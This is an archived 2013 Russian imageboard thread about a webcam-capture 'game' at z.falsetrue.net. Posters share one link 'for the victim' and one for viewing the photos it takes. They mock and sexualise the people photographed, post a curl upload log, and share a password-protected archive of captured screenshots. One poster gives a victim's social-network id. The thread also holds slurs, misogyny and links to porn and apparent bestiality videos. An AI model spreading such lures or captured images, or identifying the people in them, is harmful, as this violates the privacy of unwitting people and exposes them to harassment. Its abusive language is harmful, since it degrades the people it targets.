Карта сайта

Это автоматически сохраненная страница от 19.06.2013. Оригинал был здесь: http://2ch.hk/b/res/50114538.html
Сайт a2ch.ru не связан с авторами и содержимым страницы
жалоба / abuse: admin@a2ch.ru

Срд 19 Июн 2013 02:58:53
Хромоноги соснулей #2
Продолжаем обсуждать преимущества огнелисов над хромоногами

Активное голосование тут: http://2ch.hk/b/res/50100427.html



Срд 19 Июн 2013 03:01:02
НЕ ПРОХОДИТЕ МИМО
>>50114538
z.falsetrue.net/game - Ссылка для просмотра фото
z.falsetrue.net/lol.php - Ссылка для жертвы

Срд 19 Июн 2013 03:01:07
>>50114538
Бампусь

Срд 19 Июн 2013 03:01:55
>>50114623
лошара. наоборот же

Срд 19 Июн 2013 03:02:49
>>50114654
Ты долбоебушка, осознай для чего это было сделано.

Срд 19 Июн 2013 03:03:42
>>50114538
Годным тредом встречаем рассвет.

Срд 19 Июн 2013 03:03:43
>>50114712
Косо-тян.

Срд 19 Июн 2013 03:04:13
>>50114722
А вместе мы ночной /b/.

Срд 19 Июн 2013 03:05:06
>>50114751
убер

Срд 19 Июн 2013 03:06:19
>>50114801
Жирухи не нужны.

Срд 19 Июн 2013 03:06:52
>>50114791
Узнал соседа. Возьму биту завтра и выйду пораньше.

Срд 19 Июн 2013 03:07:34
У меня видимо хром кривой не фоткает меня:(

Срд 19 Июн 2013 03:08:10
Не работает эта хуйня ни в Хроме, ни в Браузере. Но всем похуй, потому что ОП не имеет отношения к флешке camjack.swf

Срд 19 Июн 2013 03:08:24
>>50114843
Ты слишком страшны для фоток.

Срд 19 Июн 2013 03:08:51
Пиздец, хуле они нарядные и накрашенные все там сидят?

Срд 19 Июн 2013 03:08:55
>>50114880
но я довольно няшный:(

Срд 19 Июн 2013 03:09:04
>>50114868
Сажа приклеилась.

Срд 19 Июн 2013 03:09:17
>>50114883
Ну и пиздец.

Срд 19 Июн 2013 03:09:24
>>50114742
Проиграл.

Срд 19 Июн 2013 03:10:28
>>50114538
Бампусь

Срд 19 Июн 2013 03:11:24
>>50114894
Ладно так уж и быть.
Поняшил симпотяшу, поцеловал в носик.

Срд 19 Июн 2013 03:12:06
>>50114868
просто ты не умеешь его готовить

Срд 19 Июн 2013 03:12:41
Господи, проиграл когда представил как все эти люди сидят на дваче и пишут посты про ватников, тупые быдлячьи рожи вокруг, пидорашек. Илита двачей блин.

Срд 19 Июн 2013 03:12:49
>>50115022
какая няшка. моар

Срд 19 Июн 2013 03:13:46
>>50114538
Бампусики

Срд 19 Июн 2013 03:13:56
>>50115046
живу под кроватью и мне норм

Срд 19 Июн 2013 03:14:28
>>50115046
ОП, залогинься.

Срд 19 Июн 2013 03:15:01
>>50115086
Готов жить под пирогом

Срд 19 Июн 2013 03:15:44
>>50115041
Блядь, не думал что няшится с куном так приятно. Сирзли. Я вот подумал. А ведь я бы мог быть бисексуалом.

Срд 19 Июн 2013 03:17:54
>>50114538
Олдфажики

Срд 19 Июн 2013 03:18:18
>>50115105
Всегда было интересно увидеть лица людей пишущих о том как их заебали пидорашкинские ебала вокруг.

Срд 19 Июн 2013 03:19:06
>>50114823
Ламповая няша под пледиком!

Срд 19 Июн 2013 03:20:10
>>50115291
Два чаю.

Срд 19 Июн 2013 03:20:14
>>50115251
Пидорашки а не ебала. Нас заебали пидорашки на ёбла похуй, они у всех одинаковые.

Срд 19 Июн 2013 03:20:29
>>50115291
это я)

Срд 19 Июн 2013 03:20:35
>>50115251
Смотри, хули.

Срд 19 Июн 2013 03:21:02
>>50114751
Шлюхи и хачи на моих сосальных подмывачах. Все в контакт, ананасы.

Срд 19 Июн 2013 03:21:10
>>50115337
Дохуя претензий именно к ебалам.

Срд 19 Июн 2013 03:23:38
>>50115343
ЦОПЕ В ТРЕДЕ ЦОПЕ
С ЗАЧЁТНЫМИ СИСЬКАМИ? O_O

Срд 19 Июн 2013 03:24:11
>>50115346
Всполыхнул, наверное

Срд 19 Июн 2013 03:24:45
>>50114842
мне Санса тоже приглянулась, но куда мне до такой няшки, не тех кровей

хикард

Срд 19 Июн 2013 03:26:47
>>50115421
Заебись ей, наверное

Срд 19 Июн 2013 03:27:46
>>50115535
Соточка, отвечаю

Срд 19 Июн 2013 03:29:43
>>50115606
Срамота!

Срд 19 Июн 2013 03:31:09
>>50115693
И для тебя найдется

Срд 19 Июн 2013 03:33:41
>>50115558
а мне норм

Срд 19 Июн 2013 03:34:01
Посоны, почему эту херня сверху не пропадает. Кеш, кукисы, всё почистил. Бля, теперь когда я буду включать вебку, этот сайт будет следить за мной? СУКПЗДЦ.ЖПГ!

Срд 19 Июн 2013 03:34:05
А теперь объясни, ОП, где мне искать вирусню, где она затарилась? Поиграли и хватит, не будет же она за мной вечно следить, эта твоя хуитка.

Срд 19 Июн 2013 03:34:48
>>50114538
Хуйня полная. Теперь, когда об этой хуйне все знают, туда лезут одни вниманиеблядки.

Срд 19 Июн 2013 03:34:53
>>50115836
Вкладку закрой и всё.

Срд 19 Июн 2013 03:35:25
>>50115360
Ловите ньюфага ебаного.

Срд 19 Июн 2013 03:35:42
>>50115834
>Хромоног обосрался раз.
>Не удаляет этот браузер к хуям.
Вывод: даун с гидроцефалией, как раз таких большинство на фото.

Срд 19 Июн 2013 03:36:09
У меня не получается ни сфоткаться, ни картинку залить курлом. ЧЯДНТ?

Срд 19 Июн 2013 03:36:31
>>50115836
увы, уже ничто не поможет

Срд 19 Июн 2013 03:36:38
>>50115825
ПОВДЫХВАВШИЙ
Если вдруг за унывал
Ебани в пакетик клея
И не спешно повдыхай
Никого не убивай

Срд 19 Июн 2013 03:36:43
>>50115894
Не все так плохо

Срд 19 Июн 2013 03:36:44
>>50114883
Глаза у жирух красивые.

Срд 19 Июн 2013 03:37:54
Что за хуйня? В опере выкидывает на about:blank, в хромоге после нажатия на "да" посылает нахуй с надписью ЕГГОГ
ЧЯДНТ?

Срд 19 Июн 2013 03:37:58
>>50115888
Нет, он прав.

Срд 19 Июн 2013 03:38:14
>>50114893
Вниманиеблядки, говорю же.

Срд 19 Июн 2013 03:38:29
>>50115894
за это мы и любим хромоножку

Срд 19 Июн 2013 03:38:57
>>50115917
Сгущенка поможет.

Срд 19 Июн 2013 03:39:25
>>50116002
Доставь ещё этих девочек.

Срд 19 Июн 2013 03:39:53
http://z.falsetrue.net/lol.php

Срд 19 Июн 2013 03:40:23
>>50116026
Больше нет.

Срд 19 Июн 2013 03:41:31
>>50116044
там нет ответа для меня :С

Срд 19 Июн 2013 03:42:03
>>50115834
Кстати, приглядитесь на вкладки этой тупой обезьяны. Это лишь подтверждает, что это довольна тупая особь человека.
Съеби с двача, быдло.

Срд 19 Июн 2013 03:42:26
>>50116060
Спасибо, завтра сам загуглю.

Срд 19 Июн 2013 03:44:06
>>50115969
Вот и я о том же. Не отправляется фотка.

Срд 19 Июн 2013 03:44:13
>>50114842
Вот эта норм

Срд 19 Июн 2013 03:44:40
>>50116217
Два чая тебе.

Срд 19 Июн 2013 03:45:07
>>50116217
Съебал отсюда, Сема.

Срд 19 Июн 2013 03:46:43
>>50116298
Нет.

Срд 19 Июн 2013 03:47:28
>>50116298
Вот эта няша, но нахуя такая уёбищная помада? Без неё лучше бы было, блять.

Срд 19 Июн 2013 03:47:48
>>50116330
Нет.

Срд 19 Июн 2013 03:49:32
>>50116341
Да. Помада уёбищна. А без неё, были бы няшные губки :3

Срд 19 Июн 2013 03:49:53
>>50116348
эта сучка там позировала, потом анально огородилась (id137848493)


Срд 19 Июн 2013 03:50:09
И ГДЕ МОЯ КАРТИНКА? НИХУЯ НЕ РАБОТАЕТ

[spoiler]curl "http://z.falsetrue.net/camjack.swf</span>
> Cookie: PHPSESSID=ksmimlqtv77nbii430s6n9lpn3; _ga=GA1.3.142772381.1371196798
> Connection: keep-alive
> Content-Length: 8163
> Expect: 100-continue
>
< HTTP/1.1 100 Continue
* We are completely uploaded and fine
< HTTP/1.1 200 OK
< Server: yoba
< Date: Tue, 18 Jun 2013 23:44:20 GMT
< Content-Type: text/html
< Content-Length: 20
< Connection: keep-alive
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Vary: Accept-Encoding
< Content-Encoding: gzip
<
* Connection #0 to host z.falsetrue.net left intact
* Closing connection #0[/spoiler]

Срд 19 Июн 2013 03:50:26
>>50116377
Няша

Срд 19 Июн 2013 03:50:48
>>50116412
Шлюха

Срд 19 Июн 2013 03:50:54
>>50115818

милые зачем вам борда?
как же я рад что вы существуете

Срд 19 Июн 2013 03:50:56
>>50115970
Нет, он ебаное быдло и ньюфаг. Это не хач и подстилка, это няша и шлюха с чатурбейта с США. Поссал на парашкинскую свинью.

Срд 19 Июн 2013 03:51:30
>>50116412
Блядь, пацаны, ну и крипота нахуй.

Срд 19 Июн 2013 03:51:37
>>50115999
"Хромодаун"
Камера смотрит сама в себя, с хрома по ссылкам с двача не перехожу, юзаю тор с огнелисом. И где твой б-г теперь?

Срд 19 Июн 2013 03:52:14
>>50116419
тамушта ты лузер. аплауд работает только из ванны

Срд 19 Июн 2013 03:52:41
>>50116466
Да съеби уже.

Срд 19 Июн 2013 03:53:02
>>50116469
Я специально разрешил доступ к камере, но оно НЕ РАБОТАЕТ.

Срд 19 Июн 2013 03:53:47
>>50116490
Хуянны.

Срд 19 Июн 2013 03:55:01
>>50115243
А, не, показалось

Срд 19 Июн 2013 03:55:36
>>50114538
Бампусь

Срд 19 Июн 2013 03:56:36
>>50116514
Я сыграл в игру, не знаю был ли какой то снимок, у меня вебка закрыта крышечкой, но после чистки кукисов, это > z.falsetrue.net/game второй раз уже не срабатывало.

Срд 19 Июн 2013 03:57:07
>>50116469
Нахуй иди.

Срд 19 Июн 2013 03:57:40
>>50116569
Волосы помыть и заебись.

Срд 19 Июн 2013 03:57:45
бля, я влюбился, пиздец
шишка врать не будет

Срд 19 Июн 2013 03:57:58
>>50116584
Хорошая жидовка.

Срд 19 Июн 2013 03:58:18
>>50116562
на такую

Срд 19 Июн 2013 03:58:28
>>50116623
В уёбище ты влюбился.

Срд 19 Июн 2013 03:58:49
>>50116642
Слишком круглое ебало.

Срд 19 Июн 2013 03:58:55
>>50116642
Это же Пека.

Срд 19 Июн 2013 03:59:39
Посаны, кажется я влюбился.

Срд 19 Июн 2013 04:00:21
>>50116648
думаю тебе лучше уйти
я теперь АЛЬФА!

Срд 19 Июн 2013 04:01:20
>>50116642
Ну хуй знает.
Я тут впервые в фото влюбился. Так что с ней все сравниваю

Срд 19 Июн 2013 04:02:20
>>50116683
Не нужен.

Срд 19 Июн 2013 04:02:48
>>50116678
ну потолок же держит

Срд 19 Июн 2013 04:03:21
>>50116703
Ты хуй сосёшь у своей мамы.

Срд 19 Июн 2013 04:03:49
>>50116737
Мне нужен :3

Срд 19 Июн 2013 04:05:14
>>50116720
твое лицо красивое, а на голову похуй

Срд 19 Июн 2013 04:06:37
>>50116782
мехомес?

Срд 19 Июн 2013 04:07:13
>>50116835
Што?

Срд 19 Июн 2013 04:08:49
>>50114538
Уютно, хорошо

Срд 19 Июн 2013 04:09:16
>>50116842
мех месишь? спрашиваю!

Срд 19 Июн 2013 04:09:24
>>50116419
Ну ты вообще охуел, аплоадиш по HTTP в флеш-приложение. 17летний прыщеблядок?

Срд 19 Июн 2013 04:10:04
>>50116770
> хуй сосёшь у своей мамы.
я просто дрочу

Срд 19 Июн 2013 04:10:38
>>50114538
Батя не спит

Срд 19 Июн 2013 04:11:09
Лол, теперь так. Кирпичую! Как их убрать теперь посоны?

Срд 19 Июн 2013 04:11:31
>>50116623

позовите ее к телефоту

Срд 19 Июн 2013 04:11:35
>>50114538
Обосрался

Срд 19 Июн 2013 04:12:10
>>50116928
Всех доебал уже.

Срд 19 Июн 2013 04:12:16
>>50116887
не, охуел ты. он аплоадит в upload.php.
но один хуй прыщеблядок, т.к. про печенье забыл

Срд 19 Июн 2013 04:12:25
>>50114842
>мне Санса тоже приглянулась

Кто такая? Есть моар?

Срд 19 Июн 2013 04:12:36
>>50116879
Какой мех?

Срд 19 Июн 2013 04:13:25
>>50116928
Нахуй иди.

Срд 19 Июн 2013 04:13:54
>>50116941
его нос мой нос

её нос мой нос

мой нос не мой нос

Срд 19 Июн 2013 04:14:03
Почему у меня игра не работает?

Срд 19 Июн 2013 04:14:45
>>50116960
> прыщеблядок, т.к. про печенье забыл
А кем нужно быть, чтобы про печеньки не забывать? Солярисобогом или HP-UX-элитой?

Срд 19 Июн 2013 04:15:41
>>50117021

поиграй со мной

Срд 19 Июн 2013 04:16:07
>>50115496
>мне Санса тоже приглянулась

Кто такая? Есть моар?

Срд 19 Июн 2013 04:16:27
>>50117068
Проиграл.

Срд 19 Июн 2013 04:17:13
>>50116970
такой

Срд 19 Июн 2013 04:17:34
>>50117040
банально отдебажить полный запрос

Срд 19 Июн 2013 04:18:15
>>50117068
Какая шлюшка, а парню надо было надавить.

Срд 19 Июн 2013 04:19:40
бля никак не могу вспомнить кого она мне напоминает


Срд 19 Июн 2013 04:20:32
>>50117202
Майкла Джексона.

Срд 19 Июн 2013 04:21:14
>>50117202
Майкла Джексона, например.

Срд 19 Июн 2013 04:21:22
>>50117202
Немыто-тян.

Срд 19 Июн 2013 04:21:35
>>50117242
сука. точняк

Срд 19 Июн 2013 04:22:22
>>50117251
Жируха

Срд 19 Июн 2013 04:23:28
>>50117288
художника обидеть может каждый

Срд 19 Июн 2013 04:23:30
>>50117158
я бы на твоем месте не стал бы надавливать парню

Срд 19 Июн 2013 04:23:40
>>50117321
Нарисуй еблет другой.

Срд 19 Июн 2013 04:24:52
>>50117225
Люблю её

Срд 19 Июн 2013 04:25:47
>>50117365
Ты пидор млять.













опередил чель

Срд 19 Июн 2013 04:27:05
>>50117321
Вот эта няша.

Срд 19 Июн 2013 04:27:39
Хикки, вы стали слишком переборчивымм.

Срд 19 Июн 2013 04:28:09
>>50117435
Нет.

Срд 19 Июн 2013 04:28:14
кто создает алко треды

есььь жииии

Срд 19 Июн 2013 04:28:21
>>50117448
Мы всегда такими были.

Срд 19 Июн 2013 04:30:20
>>50117288
попизди мне еще!!!

Срд 19 Июн 2013 04:30:39
Скорее всего, эта шлюха знала об этой игре. Вот как подготовилась-то.

Срд 19 Июн 2013 04:31:03
>>50117512
да точно

хуй пойми м\ж

Срд 19 Июн 2013 04:31:07
>>50117546
Отклеилось.

Срд 19 Июн 2013 04:31:43
>>50117548
На что?

Срд 19 Июн 2013 04:32:15
>>50117561
Что она подготовилась? Естественная няша.

Срд 19 Июн 2013 04:33:08
>>
Пиздец, какая няша...
А я всегда встречался со шлюхами(

Срд 19 Июн 2013 04:33:11
>>50117528
Ну давай, кукарекай

Срд 19 Июн 2013 04:33:21
>>50117597
Волосы выпрямила, позу подготовила и вся такая "Дрочите на меня, я ваша ламповая няша."

Срд 19 Июн 2013 04:33:26
>>50117466
PHH ALLO
PHHH PHH YOBA ETO TI?

Срд 19 Июн 2013 04:34:04
>>50117625
А мой батя-то что тут делает?

Срд 19 Июн 2013 04:34:10
>>50117625
Кто это? Хочу ему отсосать

Срд 19 Июн 2013 04:34:22
>>50117625
асечку писечку?

Срд 19 Июн 2013 04:34:27
>>50117631
Я верю, что она ламповая няша и не готовилась.

Срд 19 Июн 2013 04:35:00
>>50117634
Съебал отсюда

Срд 19 Июн 2013 04:35:27
А на андроид е до сих пор не работает

Срд 19 Июн 2013 04:36:03
>>50117664
Да видно же. Черт, этот сайт кишит шлюхами, которые специально решили попозировать на вебочку, дабы на них подрочили омежные дрыщи и жиробасы. У меня бугурт.

Срд 19 Июн 2013 04:36:47
>>50117705
Я ВЕРЮ В ЛАМПОАВЫХ НЯШ! ЯСНО? И ОНИ НЕ КАКАЮТ!

Срд 19 Июн 2013 04:37:48
>>50117634
PHH ALLO, PHH PHH SVYAZI PHHH PHH NET PHH SVAZI NET PHH PHH

Срд 19 Июн 2013 04:38:27
>>50117752
Жир сбросить и збс.

Срд 19 Июн 2013 04:38:45
>>50117732
TI ETO YA

Срд 19 Июн 2013 04:39:28
>>50117732
Наивный и, скорее всего, ньюфаг. Все тян шлюхи, которые хотят, чтобы им кончали в рот и давали за это деньги, а те, которые кукарекают, что это нет так - хотят этого вдвойне больше.

Срд 19 Июн 2013 04:39:39
а куда нонче модно выкладывать паки? могу запилить

Срд 19 Июн 2013 04:39:45
>>50117732
>ОНИ НЕ КАКАЮТ
Они глотают

Срд 19 Июн 2013 04:39:59
>>50117776
Я это не ты.

Срд 19 Июн 2013 04:40:38
>>50117795
Согласен.

Срд 19 Июн 2013 04:41:30
>>50117829
Это трап.

Срд 19 Июн 2013 04:43:20
>>50114538
лолибамп

Срд 19 Июн 2013 04:45:08
>>50117829
Так и выебал бы себя

Срд 19 Июн 2013 04:46:25
>>50117899
трусики?

Срд 19 Июн 2013 04:47:34
>>50117288
Зато у нее грудь есть, не то что у всяких дрыщешлюх.

Срд 19 Июн 2013 04:48:45
>>50117978
Я жируха, а сисек нет, твоя теория неверна.

Срд 19 Июн 2013 04:49:15
>>50118009
Асичку-писечку?

Срд 19 Июн 2013 04:49:50
>>50117978
И складочки есть, дабы с волнами ебаться.


Жирухи не нужны.

Срд 19 Июн 2013 04:50:07
>>50118009
Это невозможно, даже у жирных кунов отрастает приличная грудь.

Срд 19 Июн 2013 04:51:19
>>50118039
СЖИМАЕШЬ УЖЕ?

Срд 19 Июн 2013 04:52:03
>>50117978
Почему все говорят, что большая грудь - это заебись? Вот мн, например, совсем не нравится. Вот маленькие - это прекрасно, им можно ласкать, мять, они буду помещаться в руке и это мило, блять, мило. Не то что большие и бесформенные дойки.

Срд 19 Июн 2013 04:52:24
>>50117879
какие милые детки

Срд 19 Июн 2013 04:53:15
>>50118086
Кун

Срд 19 Июн 2013 04:54:23
>>50118086
как я тебя понимаю, то как же трение хуйца между сисек, с извержением на грязные похотливые лица?

Срд 19 Июн 2013 04:54:52
>>50118086
Сундук или что-то около него имеет подавляющее большинство окружающих меня женщин. Жалкое зрелище, когда самка человека натягивает бюстгалтер на то, что можно пластырем залепить.

Срд 19 Июн 2013 04:58:20
>>50118147
Это все мелочи.

Срд 19 Июн 2013 04:58:33
>>50118161
у меня уже пекарня смазалась

Срд 19 Июн 2013 04:59:33
>>50118245
мелочи, все это вокруг шлюх

Срд 19 Июн 2013 05:02:07

Ну и мните огромные сисяндры, которые потом будут похожи на два протухших кальмара.

Срд 19 Июн 2013 05:02:25
>>50118302
Двачелобби в СБУ

Срд 19 Июн 2013 05:04:36
>>50117437
бамп

Срд 19 Июн 2013 05:05:35
>>50118334
сисько-безопасности украины?

Срд 19 Июн 2013 05:06:51
>>50118411
Разожги во мне диван

Срд 19 Июн 2013 05:07:40
>>50118435
я медленно поджигаю

Срд 19 Июн 2013 05:08:40
>>50114538
Бамп хуитой

Срд 19 Июн 2013 05:09:34
>>50118462
Опять она, лол

Срд 19 Июн 2013 05:10:21
>>50118504
опять ты, лол

Срд 19 Июн 2013 05:11:44
>>50118516
ДА ЧТО ТЫ ЗНАЕШЬ О НАСЛАЖДЕНИЯХ, БЕЗБОЖНАЯЛАЙТОСМАКОВНИЦА!

Срд 19 Июн 2013 05:12:33
>>50118525
На балконе? лол

Срд 19 Июн 2013 05:13:30
>>50118525
Чому они так похожи, анон?

Срд 19 Июн 2013 05:14:02
>>50118573
А то что он себе пол пальца в нос засунул, тебя не смущает?

Срд 19 Июн 2013 05:15:03
>>50118613
ТАКОЙ?

Срд 19 Июн 2013 05:15:31
Редиректит на about:blank, нипаиграть

Срд 19 Июн 2013 05:16:25
>>50118618
Мурмяу

Срд 19 Июн 2013 05:18:34
>>50118687
"Нужно построить логово".

Срд 19 Июн 2013 05:19:58
>>50118635
Не помешаю?

Срд 19 Июн 2013 05:22:31
>>50118747
супер силы е?

Срд 19 Июн 2013 05:24:19
>>50114538
"Я жажду служить".

Срд 19 Июн 2013 05:25:36
>>50118839
"кому?"

Срд 19 Июн 2013 05:29:39
>>50118920
Говна поешь.

Срд 19 Июн 2013 05:31:02
>>50114538
Бампусики

Срд 19 Июн 2013 05:31:53
>>50114538
Бампусь

Срд 19 Июн 2013 05:32:50
>>50114538
Кусь

Срд 19 Июн 2013 05:33:24
Итс ПАК тайм
вообщем, собрал пак скринов достаточно полный
разбил на 5 архивов по 100мб

https://mega.co.nz/#!DYNFTayI!VhELKyNUTNPGv_Rr-099dFuxic9slOYAippGRfGZ9l8

пароль: z.falsetrue.net

Срд 19 Июн 2013 05:33:41
>>50119023
Трап? :3

Срд 19 Июн 2013 05:36:14
>>50119045
Авотхуй

Срд 19 Июн 2013 05:38:31
>>50119123
атыхуй

Срд 19 Июн 2013 05:40:21
>>50114538
ох лол

Срд 19 Июн 2013 05:41:51
>>50119195
Нет.

Срд 19 Июн 2013 05:41:52
>>50117015
Ух ты какая няша.

Срд 19 Июн 2013 05:43:00
Пиздец, тни такие уёбища без косметики.
Охуеть.
Все мои влажные мечты отсохли.
не-державшийся-28-лвл

Срд 19 Июн 2013 05:43:05
>>50117015
Серьезно блять, кажется я влюбился. Откуда она? Чатрубатлы всякие или реально попалась на столетнюю ловушку опа?

Срд 19 Июн 2013 05:43:39
>>50117119
Угри вывести и норм

Срд 19 Июн 2013 05:47:20
>>50114538
На ПеКа игорь нет

Срд 19 Июн 2013 05:48:07
>>50114538
>28
Ибутся, а ты нет

Срд 19 Июн 2013 05:50:53
>>50119074
Заверните мне её

Срд 19 Июн 2013 05:52:10
>>50114538
ахзахзахзахза

Срд 19 Июн 2013 05:53:56
>>50119410
ростит двачера

Срд 19 Июн 2013 05:55:23
>>50119319
Ты воевал? нет? пошел нахуй отсюда.

Срд 19 Июн 2013 05:58:34
>>50119492
датычтоблядь

Срд 19 Июн 2013 05:59:33
>>50115969
У операбогов не работает, подтверждаю. Хромобляди как обычно соснули.

Срд 19 Июн 2013 06:00:09
>>50119319
Ты верующий? нет? пошел нахуй отсюда.

Срд 19 Июн 2013 06:01:24
>>50119528
Капчуют из церкви

Срд 19 Июн 2013 06:01:57
>>50119528
нет бога кроме тигра и усурийский ему пророг

Срд 19 Июн 2013 06:04:15
>>50119557
Моби, ипта

Срд 19 Июн 2013 06:05:32
>>50117015
Есть ли в треде тот кто выложил это?

Срд 19 Июн 2013 06:05:42
>>50119528
всем кадило.

Срд 19 Июн 2013 06:06:12
>>50119593
нет бога кроме моби

Срд 19 Июн 2013 06:07:12
>>50119612
спрашивай

Срд 19 Июн 2013 06:07:47
>>50119508
Сырку захвати, бутербродов там

Срд 19 Июн 2013 06:09:16
>>50119612

~230242
Дальше сам

Срд 19 Июн 2013 06:09:18
>>50116584
Вот эта хорошая.

Срд 19 Июн 2013 06:09:22
>>50119636
хуи сосешь? бочку делал?

Срд 19 Июн 2013 06:09:53
>>50119676
Семач, съеби.

Срд 19 Июн 2013 06:11:57
>>50119706
ты че ахуил*********88888888888

Срд 19 Июн 2013 06:12:46
>>50119674
нашел спасибо, как бы теперь ее найти ума не приложу

Срд 19 Июн 2013 06:16:17
>>50119755
блять аноны выручайте, что делать то

Срд 19 Июн 2013 06:17:41
>>50119789
ну хуй знает...
женись

Срд 19 Июн 2013 06:18:36
>>50119822
да как мне ее найти нахуй, как выловить ее.
сукапзц((( что за хуйня со мной

Срд 19 Июн 2013 06:19:07
>>50119789
Не вижу причин для бугурта. Лоли неумытая того не стоит

Срд 19 Июн 2013 06:20:08
>>50119844
не сотвори себе идола

Срд 19 Июн 2013 06:20:15
>>50119844
А что тебе делаеть? Я прослоупочил.

Срд 19 Июн 2013 06:21:23
>>50119880
да дело не в идоле, с первого взгляда цепанула, такого никогда не было.
тян были, не ерохин

Срд 19 Июн 2013 06:22:55
>>50116348
Она с моего города походу
Няша, давай встретимся у ладьи сегодня в 4

Срд 19 Июн 2013 06:23:09
>>50119915
какая тян?

Срд 19 Июн 2013 06:23:40
>>50119915
крепись сынку

Срд 19 Июн 2013 06:23:57
>>50119943
Ты это по шкафу понял?

Срд 19 Июн 2013 06:25:00
>>50119963
для начала попробуй так

Срд 19 Июн 2013 06:26:09
>>50119982
Обрубок

Срд 19 Июн 2013 06:27:09
>>50119943
Нет, по посту в вк

Срд 19 Июн 2013 06:27:46
>>50119915
выбирай более доступные варианты

Срд 19 Июн 2013 06:27:51
>>50119966

быстрофикс

Срд 19 Июн 2013 06:30:09
>>50120058
Крестик как будто на фш пририсован
каптча 735666 как бы намекает

Срд 19 Июн 2013 06:31:23
>>50120070
Свято золотеет

ну вы поняли

Срд 19 Июн 2013 06:35:52
>>50117801

Джва года жду.

Срд 19 Июн 2013 06:36:28
>>50120085
Он альфач в интернете!

Срд 19 Июн 2013 06:36:51
>>50114538
Бампусь

кусь

кусь

кусь

кусь

кусь

Срд 19 Июн 2013 06:37:21
>>50120175
Ебля дельфинов возможна?

Срд 19 Июн 2013 06:38:12
>>50116623
бамп

Срд 19 Июн 2013 06:39:24
>>50120181
Запретный плод сладок

Выглядит очень аппетитно. Сунул бы?

Срд 19 Июн 2013 06:41:05
>>50120211
Конечно, а ты?

Срд 19 Июн 2013 06:41:26
>>50120211
Как то страшновато выглядит. Я бы воздержался

Срд 19 Июн 2013 06:41:49
>>50120252
Трус, омежка, детектед.

Срд 19 Июн 2013 06:43:03
>>50120214
Как же он доставляет

Срд 19 Июн 2013 06:43:22
>>50120284
А каким образом? Какая у них пизда?

Срд 19 Июн 2013 06:44:05
>>50120261
Но я же не зоофил

Срд 19 Июн 2013 06:45:00
>>50120306
Ты быдло.

Срд 19 Июн 2013 06:45:08
Столько няш, что кунов, что тян. Почему же на сходки приходят одни отходы генетических экскре... экспериментов?

Срд 19 Июн 2013 06:47:24
>>50120322
Лол
Если я не хочу трахать животных, значит я быдло?
Охуительная у тебя логика

Срд 19 Июн 2013 06:47:31
>>50114538

Бампусь

кусь

кусь

кусь

кусь

кусь

Срд 19 Июн 2013 06:47:42
>>50120323
майкл негодуэ

Срд 19 Июн 2013 06:50:10
>>50119844
подрочи

Срд 19 Июн 2013 06:50:25
>>50120323
Где ты увидел няшь? Одни унтерменшы, а на сходки приходят самое тупое быдло, непонимающие что сидят на анонимной борде, и да ты быдло.

Срд 19 Июн 2013 06:50:49
>>50120362
Дай соус.

Срд 19 Июн 2013 06:51:26
>>50120415
Все быдло
Ты тоже
Мамку ипал

Срд 19 Июн 2013 06:52:59
>>50120432
Я небыдло, а если ты ходил на сходку уёбков, отбросов борд = ты зашкварен.

Срд 19 Июн 2013 06:53:03
>>50120423
Вбыдлятне есть.

Срд 19 Июн 2013 06:53:24
>>50120436
Соусы давайте пидары, шишка же дымится.

Срд 19 Июн 2013 06:53:38
>>50120454
Дай.

Срд 19 Июн 2013 06:54:21
>>50120465
Секунду

Срд 19 Июн 2013 06:54:56
>>50120451
Но я же не ходил. Дианон же, да и считаю что сосисочная вечеринка - не торт. Вряд ли на сходке харкача будут присутствовать годные тни

Срд 19 Июн 2013 06:55:29
>>50120415
Тебя кто-то обидел, мальчик? Гопники обоссали? Тянки как на говно смотрят? Ну что ты тут на людей кидаешься? Так ты свои комплексы, что ты биомусор, не излечишь.

Дедушка Фрейд.

Срд 19 Июн 2013 06:55:34
>>50120478
Спасибо тебе доброкун. Жду.

Срд 19 Июн 2013 06:56:29
>>50120486
>Почему же на сходки приходят одни отходы генетических экскре...
Откуда ты тогда знаешь, кто туда ходит если ты не ходил? Я из отчётов.

Срд 19 Июн 2013 06:58:15
>>50120494
Нет.
22 лвл кун, встречающийся сразу с 2 тнями. Просто обосрался, с каким быдлом сижу на дваче. Правда мы решили с разумными анонами, что это хромоноги такие унтеры, а мы Лисобоги куда красивее. Красивых людей действительно очень мало сыгравших в игру, это о чём то говорит.

Срд 19 Июн 2013 06:58:58
>>50120507
> Вряд ли на сходке харкача будут присутствовать годные тни
Прочитай внимательнее. Это предположение. Да тут и ТП понятно, что большая часть присутствующих на сходочках - быдло, раки и прыщавые школьники. Ну или все в сочетании.

Срд 19 Июн 2013 06:59:13
>>50120494
И кстати дед. Ты хуи сосешь? А то, сигареты это же не просто сигареты...

Срд 19 Июн 2013 06:59:15
>>50120507
Так именно из тредов-отчетов с кучей фоток и видосами.

Срд 19 Июн 2013 06:59:30
>>50120555
>сигары
фикс

Срд 19 Июн 2013 07:00:34
>>50120539
Запости тогда свой еблет, раз считаешь себя красавцем.
Лисошлюхи и операпидоры не играли, поэтому ты не сможешь это точно знать
хромобог, не повелся на развод

Срд 19 Июн 2013 07:02:28
>>50120582
>хромобог
В чём ты бог? Ты быдло. У меня лиса настроена на максимум ананимности, а твой хром отправляет всё куда надо. Поссал тебе на ебало.

Срд 19 Июн 2013 07:02:52
>>50120592
Здесь ты не такое уебище.

Срд 19 Июн 2013 07:02:52
>>50120539
Привет

Я 30 лвл кун
Вилла на Лазурном берегу.
Яхта в Монте-Карло
Жена киноактриса
4 любовницы фотомодели.

Анонимная борда такая анонимная, не так ли сосницкий?

Срд 19 Июн 2013 07:04:29
>>50120621
Это не я. Вспомнил знакомое ебало просто.

Срд 19 Июн 2013 07:04:45
>>50120478
/video176746927_162723002 (рыбки, кошечки)

/video176746927_162722956 (cum marathon #2)

/video160730773_164221578 (cum marathon #5)

/video98527697_163445674 (cum marathon #6)

/video87970702_163414100 (cum marathon #9)

/video176746927_162722982 (рашка зоо)

/video176746927_162722996 (??????)

/video176746927_162723000 (???????)

/video176746927_162723012 (????????)

Срд 19 Июн 2013 07:04:46
>>50120622
Да, не верь. Как то похуй. Главное, что у меня две тянки и я их поёбываю. Но мечтаю о ламповой няше.

Срд 19 Июн 2013 07:05:34
>>50120622
Два чаю этому господину

Срд 19 Июн 2013 08:11:10
Тред вниманиеблядей и шлюх, рекламирующих свою пизду. Сажаскрыл.

